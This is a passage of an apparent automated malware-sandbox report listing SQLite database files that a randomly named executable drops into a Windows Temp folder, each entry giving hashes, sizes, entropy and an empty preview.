                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sp3w1CihU0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sxErcKe95u

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tcvaOXrvDO

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tdbkQMXWFq

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\u4rJ4YQFPd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\uAtojhulGp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\uOgota067b

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\uP3Sb9NEYB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ugnzu9dgO7

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\vFP4J7cXG1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\vzW7cVqk6B

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\w9K9PVJk7C

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wHU4Wp5cMx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wyPcM5nqV0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xlXtFVAE2S

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xpPOrsXKRN

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yDfN3DM9UU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yI4w1mZeeD

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yLNdaDy5GK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yOeBLWaZ79

